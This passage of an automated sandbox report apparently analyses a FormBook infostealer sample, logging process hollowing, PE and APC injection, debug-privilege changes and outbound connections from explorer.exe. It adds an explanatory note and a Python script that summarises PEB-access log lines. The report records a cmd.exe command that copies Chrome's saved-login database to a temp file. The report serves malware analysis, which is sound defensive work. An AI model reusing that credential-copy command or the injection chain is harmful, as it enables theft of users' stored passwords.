Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034F1C06 mov eax, dword ptr fs:[00000030h] 2_2_034F1C06
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034F1C06 mov eax, dword ptr fs:[00000030h] 2_2_034F1C06
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034F1C06 mov eax, dword ptr fs:[00000030h] 2_2_034F1C06
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034F1C06 mov eax, dword ptr fs:[00000030h] 2_2_034F1C06
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034F1C06 mov eax, dword ptr fs:[00000030h] 2_2_034F1C06
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034F1C06 mov eax, dword ptr fs:[00000030h] 2_2_034F1C06
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034F1C06 mov eax, dword ptr fs:[00000030h] 2_2_034F1C06
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034F1C06 mov eax, dword ptr fs:[00000030h] 2_2_034F1C06
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034F1C06 mov eax, dword ptr fs:[00000030h] 2_2_034F1C06
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034F1C06 mov eax, dword ptr fs:[00000030h] 2_2_034F1C06
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034F1C06 mov eax, dword ptr fs:[00000030h] 2_2_034F1C06
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0350740D mov eax, dword ptr fs:[00000030h] 2_2_0350740D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0350740D mov eax, dword ptr fs:[00000030h] 2_2_0350740D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0350740D mov eax, dword ptr fs:[00000030h] 2_2_0350740D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0346BC2C mov eax, dword ptr fs:[00000030h] 2_2_0346BC2C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_03508CD6 mov eax, dword ptr fs:[00000030h] 2_2_03508CD6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034F14FB mov eax, dword ptr fs:[00000030h] 2_2_034F14FB
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034B6CF0 mov eax, dword ptr fs:[00000030h] 2_2_034B6CF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034B6CF0 mov eax, dword ptr fs:[00000030h] 2_2_034B6CF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_034B6CF0 mov eax, dword ptr fs:[00000030h] 2_2_034B6CF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 2_2_0344849B mov eax, dword ptr fs:[00000030h] 2_2_0344849B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0309A309 mov eax, dword ptr fs:[00000030h] 6_2_0309A309
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0313131B mov eax, dword ptr fs:[00000030h] 6_2_0313131B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0307DB40 mov eax, dword ptr fs:[00000030h] 6_2_0307DB40
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03148B58 mov eax, dword ptr fs:[00000030h] 6_2_03148B58
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0307F358 mov eax, dword ptr fs:[00000030h] 6_2_0307F358
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0307DB60 mov ecx, dword ptr fs:[00000030h] 6_2_0307DB60
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030A3B7A mov eax, dword ptr fs:[00000030h] 6_2_030A3B7A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030A138B mov eax, dword ptr fs:[00000030h] 6_2_030A138B
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03081B8F mov eax, dword ptr fs:[00000030h] 6_2_03081B8F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0312D380 mov ecx, dword ptr fs:[00000030h] 6_2_0312D380
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0313138A mov eax, dword ptr fs:[00000030h] 6_2_0313138A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030AB390 mov eax, dword ptr fs:[00000030h] 6_2_030AB390
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030A2397 mov eax, dword ptr fs:[00000030h] 6_2_030A2397
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030A4BAD mov eax, dword ptr fs:[00000030h] 6_2_030A4BAD
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03145BA5 mov eax, dword ptr fs:[00000030h] 6_2_03145BA5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030F53CA mov eax, dword ptr fs:[00000030h] 6_2_030F53CA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0309DBE9 mov eax, dword ptr fs:[00000030h] 6_2_0309DBE9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030A03E2 mov eax, dword ptr fs:[00000030h] 6_2_030A03E2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_031223E3 mov ecx, dword ptr fs:[00000030h] 6_2_031223E3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_031223E3 mov eax, dword ptr fs:[00000030h] 6_2_031223E3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03088A0A mov eax, dword ptr fs:[00000030h] 6_2_03088A0A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0313AA16 mov eax, dword ptr fs:[00000030h] 6_2_0313AA16
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0307AA16 mov eax, dword ptr fs:[00000030h] 6_2_0307AA16
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03093A1C mov eax, dword ptr fs:[00000030h] 6_2_03093A1C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03075210 mov eax, dword ptr fs:[00000030h] 6_2_03075210
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03075210 mov ecx, dword ptr fs:[00000030h] 6_2_03075210
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03075210 mov eax, dword ptr fs:[00000030h] 6_2_03075210
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0309A229 mov eax, dword ptr fs:[00000030h] 6_2_0309A229
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B4A2C mov eax, dword ptr fs:[00000030h] 6_2_030B4A2C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0309B236 mov eax, dword ptr fs:[00000030h] 6_2_0309B236
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0313EA55 mov eax, dword ptr fs:[00000030h] 6_2_0313EA55
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03079240 mov eax, dword ptr fs:[00000030h] 6_2_03079240
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03104257 mov eax, dword ptr fs:[00000030h] 6_2_03104257
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B927A mov eax, dword ptr fs:[00000030h] 6_2_030B927A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0312B260 mov eax, dword ptr fs:[00000030h] 6_2_0312B260
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03148A62 mov eax, dword ptr fs:[00000030h] 6_2_03148A62
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030AD294 mov eax, dword ptr fs:[00000030h] 6_2_030AD294
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030752A5 mov eax, dword ptr fs:[00000030h] 6_2_030752A5
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0308AAB0 mov eax, dword ptr fs:[00000030h] 6_2_0308AAB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030AFAB0 mov eax, dword ptr fs:[00000030h] 6_2_030AFAB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030A2ACB mov eax, dword ptr fs:[00000030h] 6_2_030A2ACB
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030A2AE4 mov eax, dword ptr fs:[00000030h] 6_2_030A2AE4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03134AEF mov eax, dword ptr fs:[00000030h] 6_2_03134AEF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03079100 mov eax, dword ptr fs:[00000030h] 6_2_03079100
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03094120 mov eax, dword ptr fs:[00000030h] 6_2_03094120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03094120 mov ecx, dword ptr fs:[00000030h] 6_2_03094120
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030A513A mov eax, dword ptr fs:[00000030h] 6_2_030A513A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0309B944 mov eax, dword ptr fs:[00000030h] 6_2_0309B944
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0307C962 mov eax, dword ptr fs:[00000030h] 6_2_0307C962
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0307B171 mov eax, dword ptr fs:[00000030h] 6_2_0307B171
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0309C182 mov eax, dword ptr fs:[00000030h] 6_2_0309C182
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030AA185 mov eax, dword ptr fs:[00000030h] 6_2_030AA185
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030A2990 mov eax, dword ptr fs:[00000030h] 6_2_030A2990
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030F69A6 mov eax, dword ptr fs:[00000030h] 6_2_030F69A6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030A61A0 mov eax, dword ptr fs:[00000030h] 6_2_030A61A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030F51BE mov eax, dword ptr fs:[00000030h] 6_2_030F51BE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030999BF mov ecx, dword ptr fs:[00000030h] 6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030999BF mov eax, dword ptr fs:[00000030h] 6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030999BF mov ecx, dword ptr fs:[00000030h] 6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030999BF mov eax, dword ptr fs:[00000030h] 6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030999BF mov ecx, dword ptr fs:[00000030h] 6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030999BF mov eax, dword ptr fs:[00000030h] 6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030999BF mov ecx, dword ptr fs:[00000030h] 6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030999BF mov eax, dword ptr fs:[00000030h] 6_2_030999BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_031349A4 mov eax, dword ptr fs:[00000030h] 6_2_031349A4
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0307B1E1 mov eax, dword ptr fs:[00000030h] 6_2_0307B1E1
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_031041E8 mov eax, dword ptr fs:[00000030h] 6_2_031041E8
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03144015 mov eax, dword ptr fs:[00000030h] 6_2_03144015
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030F7016 mov eax, dword ptr fs:[00000030h] 6_2_030F7016
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0308B02A mov eax, dword ptr fs:[00000030h] 6_2_0308B02A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030A002D mov eax, dword ptr fs:[00000030h] 6_2_030A002D
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0309A830 mov eax, dword ptr fs:[00000030h] 6_2_0309A830
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03090050 mov eax, dword ptr fs:[00000030h] 6_2_03090050
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03132073 mov eax, dword ptr fs:[00000030h] 6_2_03132073
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03141074 mov eax, dword ptr fs:[00000030h] 6_2_03141074
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_03079080 mov eax, dword ptr fs:[00000030h] 6_2_03079080
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030F3884 mov eax, dword ptr fs:[00000030h] 6_2_030F3884
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030B90AF mov eax, dword ptr fs:[00000030h] 6_2_030B90AF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030A20A0 mov eax, dword ptr fs:[00000030h] 6_2_030A20A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030AF0BF mov ecx, dword ptr fs:[00000030h] 6_2_030AF0BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_030AF0BF mov eax, dword ptr fs:[00000030h] 6_2_030AF0BF
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0310B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0310B8D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0310B8D0 mov ecx, dword ptr fs:[00000030h] 6_2_0310B8D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 6_2_0310B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0310B8D0
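Each line above records one function that executes `mov eax, dword ptr fs:[00000030h]` (or the `ecx` variant). For 32-bit code, including the 32-bit ieinstal.exe from Program Files (x86) running under WOW64, the `fs` segment addresses the Thread Environment Block and offset 0x30 holds the pointer to the Process Environment Block. The signature fires on that pointer fetch alone; whether the code then reads PEB.BeingDebugged (+0x02), PEB.NtGlobalFlag (+0x68) or walks PEB.Ldr (+0x0C) to resolve APIs without an import table is not recorded in these lines, so the raw count mixes anti-debug checks with ordinary loader-style code. The Python below is an added example, not part of the report or of the sandbox product: it parses lines in this shape and summarises them per process index, so the analyst sees how many distinct functions touch the PEB in each process rather than how many times one function was logged. The sample lines are constructed in the report's format, and the reading of the `6_2_` prefix as process index and run counter is an assumption.

```python
"""Summarise the report's 'mov eax, dword ptr fs:[00000030h]' hits per process.

fs:[0x30] is TEB.ProcessEnvironmentBlock on 32-bit Windows; these lines only
show that the PEB pointer was fetched, not which PEB field was consumed.
"""
import re
from collections import defaultdict

# Constructed sample in the shape of the report's lines (a non-matching line is
# included to show that unrelated events are ignored).
SAMPLE_LINES = [
    "Source: C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe Code function: 2_2_034B6CF0 mov eax, dword ptr fs:[00000030h] 2_2_034B6CF0",
    "Source: C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe Code function: 2_2_034B6CF0 mov eax, dword ptr fs:[00000030h] 2_2_034B6CF0",
    "Source: C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe Code function: 2_2_0344849B mov eax, dword ptr fs:[00000030h] 2_2_0344849B",
    "Source: C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe Code function: 6_2_0309A309 mov eax, dword ptr fs:[00000030h] 6_2_0309A309",
    "Source: C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe Code function: 6_2_0309A309 mov eax, dword ptr fs:[00000030h] 6_2_0309A309",
    "Source: C:\\Program Files (x86)\\Internet Explorer\\ieinstal.exe Code function: 6_2_0307DB60 mov ecx, dword ptr fs:[00000030h] 6_2_0307DB60",
    "Source: C:\\Windows\\SysWOW64\\msdt.exe Process token adjusted: Debug",
]

# '<pid>_<run>_<address>' is read here as sandbox process index, run counter and
# function start address (assumed interpretation of the report's identifier).
PEB_READ = re.compile(
    r"^Source: (?P<image>.+?) Code function: "
    r"(?P<pid>\d+)_(?P<run>\d+)_(?P<addr>[0-9A-Fa-f]{8}) "
    r"mov (?P<reg>e[a-d]x|e[sd]i|e[bs]p), dword ptr fs:\[00000030h\]"
)

def parse_peb_read(line):
    """Return {image, pid, addr, reg} for a PEB-pointer read line, else None."""
    m = PEB_READ.match(line)
    if not m:
        return None
    return {
        "image": m.group("image"),
        "pid": int(m.group("pid")),      # report process index, not an OS PID
        "addr": int(m.group("addr"), 16),
        "reg": m.group("reg"),
    }

def summarize_peb_reads(lines):
    """Per process index: distinct functions, total hits and address range."""
    per_pid = defaultdict(lambda: {"image": None, "functions": set(), "hits": 0})
    for line in lines:
        hit = parse_peb_read(line)
        if hit is None:
            continue
        entry = per_pid[hit["pid"]]
        entry["image"] = hit["image"]
        entry["functions"].add(hit["addr"])   # repeated lines collapse here
        entry["hits"] += 1
    result = {}
    for pid, entry in per_pid.items():
        funcs = sorted(entry["functions"])
        result[pid] = {
            "image": entry["image"],
            "distinct_functions": len(funcs),
            "hits": entry["hits"],
            "lowest": funcs[0],
            "highest": funcs[-1],
        }
    return result

if __name__ == "__main__":
    for pid, s in sorted(summarize_peb_reads(SAMPLE_LINES).items()):
        print(f"process {pid} ({s['image']}): {s['distinct_functions']} functions, "
              f"{s['hits']} hits, 0x{s['lowest']:08X}-0x{s['highest']:08X}")
```

The address range per process is worth keeping: when it lies far from the base at which the report shows a PE being written into ieinstal.exe, the reads come from a different region than the injected image, which is a cue to dump that region rather than only the 0x400000 image.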
Enables debug privileges
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\msdt.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\wlanext.exe Process token adjusted: Debug
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 162.0.238.42 80
Source: C:\Windows\explorer.exe Network Connect: 157.245.239.6 80
Source: C:\Windows\explorer.exe Network Connect: 23.227.38.74 80
Source: C:\Windows\explorer.exe Network Connect: 208.91.197.27 80
Source: C:\Windows\explorer.exe Network Connect: 66.235.200.146 80
Source: C:\Windows\explorer.exe Network Connect: 104.24.104.178 80
Source: C:\Windows\explorer.exe Network Connect: 52.60.87.163 80
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.210 80
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe Network Connect: 104.31.71.137 80
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.215 80
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\AT113020.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Memory allocated: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\AT113020.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\msdt.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread register set: target process: 3472
Source: C:\Windows\SysWOW64\msdt.exe Thread register set: target process: 3472
Queues an APC in another process (thread injection)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 180000
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section unmapped: C:\Windows\SysWOW64\msdt.exe base address: 9C0000
Writes to foreign memory regions
Source: C:\Users\user\Desktop\AT113020.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000
Source: C:\Users\user\Desktop\AT113020.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2CC2008
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 6A4008
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 400000
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Memory written: C:\Program Files (x86)\Internet Explorer\ieinstal.exe base: 2A01008
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\AT113020.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: explorer.exe, 00000003.00000002.1017233955.0000000001640000.00000002.00000001.sdmp, msdt.exe, 00000008.00000002.1018849966.0000000002CD0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000002.1017233955.0000000001640000.00000002.00000001.sdmp, msdt.exe, 00000008.00000002.1018849966.0000000002CD0000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000003.00000002.1017233955.0000000001640000.00000002.00000001.sdmp, msdt.exe, 00000008.00000002.1018849966.0000000002CD0000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000003.00000002.1016058264.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000003.00000002.1017233955.0000000001640000.00000002.00000001.sdmp, msdt.exe, 00000008.00000002.1018849966.0000000002CD0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000003.00000002.1017233955.0000000001640000.00000002.00000001.sdmp, msdt.exe, 00000008.00000002.1018849966.0000000002CD0000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\AT113020.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 1_2_00405F80
Source: C:\Users\user\Desktop\AT113020.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 1_2_0040608C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 5_2_00405F80
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA, 5_2_0040608C
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: GetLocaleInfoA, 5_2_0040BEEC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: GetLocaleInfoA, 5_2_0040BEA0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 5_2_040E5BA4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: GetLocaleInfoA, 5_2_040EA4A0
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Accfdrv.exe Code function: GetLocaleInfoA, 5_2_040EA4EC
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_0040A8E8 GetLocalTime, 1_2_0040A8E8
Source: C:\Users\user\Desktop\AT113020.exe Code function: 1_2_0048D5D0 GetVersion, 1_2_0048D5D0

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000008.00000002.1019192293.00000000041E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.291702047.0000000004D34000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.291786561.0000000004DC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1015357654.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.290339336.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.290677967.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.242236710.0000000002A55000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.242326324.0000000002AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.276173804.0000000002A64000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.292339474.0000000002610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.289704123.0000000002FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.284307510.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.283670455.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.284896549.0000000002F30000.00000040.00000001.sdmp, type: MEMORY
